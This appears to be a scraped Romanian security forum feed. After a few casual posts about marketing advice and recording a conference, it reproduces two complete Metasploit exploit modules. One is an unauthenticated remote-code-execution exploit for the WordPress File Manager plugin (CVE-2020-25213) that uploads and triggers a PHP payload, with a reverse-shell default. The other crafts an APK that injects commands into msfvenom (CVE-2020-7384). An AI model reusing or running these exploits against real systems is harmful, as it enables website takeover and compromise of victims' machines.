Leaderboard

Daca astepti ceva mai serios fii si tu la fel. Adica ofera putin context despre firma respectiva: are o nisa anume sau nu, zona de operare, care sunt principalii competitori, ce unique selling points ai, cam ce ai vrea sa ramana in capul unuia care il vede - un singur mesaj subliminal (ex daca ii folosesc pe astia sunt cei mai ieftini) si alte info relevante.

Cred ca ai mai multe șanse pe TPU Oh wait...

Ne miscam ca ochii mortului

Scump da ieftin

O sa fie inregistrata si voi publica ulterior (zilele urmatoare) prezentarile pe Youtube (probabil). Va trebui probabil sa "tai" fiecare prezentare ca cineva sa le poata vedea cum trebuie, deci nu stiu daca va merge direct in Zoom ca nu ar fi elegant asa la gramada.

@Nytro Cred ca se poate pune recording pe webinar si sa fie salvat ori local ori direct pe serverul de la Zoom

Rog cei care au posibilitate sa "imortalizeze" conferinta si sa uploadeze pe o platforma de streaming, din pacate nu o sa pot sa fiu prezent

The WordPress File Manager (wp-file-manager) plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HTTP::Wordpress prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress File Manager Unauthenticated Remote Code Execution', 'Description' => %q{ The File Manager (wp-file-manager) plugin from 6.0 to 6.8 for WordPress allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload (or mkfile and put) command to write PHP code into the wp-content/plugins/wp-file-manager/lib/files/ directory. }, 'License' => MSF_LICENSE, 'Author' => [ 'Alex Souza (w4fz5uck5)', # initial discovery and PoC 'Imran E. Dawoodjee <imran [at] threathounds.com>', # msf module ], 'References' => [ [ 'URL', 'https://github.com/w4fz5uck5/wp-file-manager-0day' ], [ 'URL', 'https://www.tenable.com/cve/CVE-2020-25213' ], [ 'CVE', '2020-25213' ] ], 'Platform' => [ 'php' ], 'Privileged' => false, 'Arch' => ARCH_PHP, 'Targets' => [ [ 'WordPress File Manager 6.0-6.8', { 'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' } } ] ], 'DisclosureDate' => '2020-09-09', # disclosure date on NVD, PoC was published on August 26 2020 'DefaultTarget' => 0 ) ) register_options( [ OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']), OptEnum.new('COMMAND', [true, 'elFinder commands used to exploit the vulnerability', 'upload', %w[upload mkfile+put]]) ] ) end def check return CheckCode::Unknown unless wordpress_and_online? # check the plugin version from readme check_plugin_version_from_readme('wp-file-manager', '6.9', '6.0') end def exploit # base path to File Manager plugin file_manager_base_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-file-manager') # filename of the file to be uploaded/created filename = "#{Rex::Text.rand_text_alphanumeric(6)}.php" register_file_for_cleanup(filename) case datastore['COMMAND'] when 'upload' elfinder_post(file_manager_base_uri, 'upload', 'payload' => payload.encoded, 'filename' => filename) when 'mkfile+put' elfinder_post(file_manager_base_uri, 'mkfile', 'filename' => filename) elfinder_post(file_manager_base_uri, 'put', 'payload' => payload.encoded, 'filename' => filename) end payload_uri = normalize_uri(file_manager_base_uri, 'lib', 'files', filename) print_status("#{peer} - Payload is at #{payload_uri}") # execute the payload send_request_cgi('uri' => normalize_uri(payload_uri)) end # make it easier to switch between "upload" and "mkfile+put" exploit methods def elfinder_post(file_manager_base_uri, elfinder_cmd, opts = {}) filename = opts['filename'] # prep for exploit post_data = Rex::MIME::Message.new post_data.add_part(elfinder_cmd, nil, nil, 'form-data; name="cmd"') case elfinder_cmd when 'upload' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"upload[]\"; filename=\"#{filename}\"") when 'mkfile' post_data.add_part('l1_', nil, nil, 'form-data; name="target"') post_data.add_part(filename, nil, nil, 'form-data; name="name"') when 'put' post_data.add_part("l1_#{Rex::Text.encode_base64(filename)}", nil, nil, 'form-data; name="target"') post_data.add_part(payload.encoded, nil, nil, 'form-data; name="content"') end res = send_request_cgi( 'uri' => normalize_uri(file_manager_base_uri, 'lib', 'php', 'connector.minimal.php'), 'method' => 'POST', 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", 'data' => post_data.to_s ) fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200 end end Source

This Metasploit module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affected includes Metasploit Framework versions 6.0.11 and below and Metasploit Pro versions 4.18.0 and below. ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'rex/zip/jar' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super( update_info( info, 'Name' => 'Rapid7 Metasploit Framework msfvenom APK Template Command Injection', 'Description' => %q{ This module exploits a command injection vulnerability in Metasploit Framework's msfvenom payload generator when using a crafted APK file as an Android payload template. Affects Metasploit Framework <= 6.0.11 and Metasploit Pro <= 4.18.0. The file produced by this module is a relatively empty yet valid-enough APK file. To trigger the vulnerability, the victim user should do the following: msfvenom -p android/<...> -x <crafted_file.apk> }, 'License' => MSF_LICENSE, 'Author' => [ 'Justin Steven' # @justinsteven ], 'References' => [ ['URL', 'https://github.com/justinsteven/advisories/blob/master/2020_metasploit_msfvenom_apk_template_cmdi.md'], ['CVE', '2020-7384'], ], 'DefaultOptions' => { 'DisablePayloadHandler' => true }, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'BadChars' => "\x22\x2c\x5c\x0a\x0d" }, 'Targets' => [[ 'Automatic', {}]], 'Privileged' => false, 'DisclosureDate' => '2020-10-29' ) ) register_options([ OptString.new('FILENAME', [true, 'The APK file name', 'msf.apk']) ]) end def build_x509_name name = "CN=';(#{payload.encoded}) >&- 2>&- & #" OpenSSL::X509::Name.parse(name) end def generate_signing_material key = OpenSSL::PKey::RSA.new(2048) cert = OpenSSL::X509::Certificate.new cert.version = 2 cert.serial = 1 cert.subject = cert.issuer = build_x509_name cert.public_key = key.public_key cert.not_before = Time.now # FIXME: this will break in the year 2037 on 32-bit systems cert.not_after = cert.not_before + 1.year # Self-sign the certificate, otherwise the victim's keytool gets unhappy cert.sign(key, OpenSSL::Digest::SHA256.new) [cert, key] end def exploit print_warning('Warning: bash payloads are unlikely to work') if datastore['PAYLOAD'].include?('bash') apk = Rex::Zip::Jar.new apk.build_manifest cert, key = generate_signing_material apk.sign(key, cert) data = apk.pack file_create(data) end end Source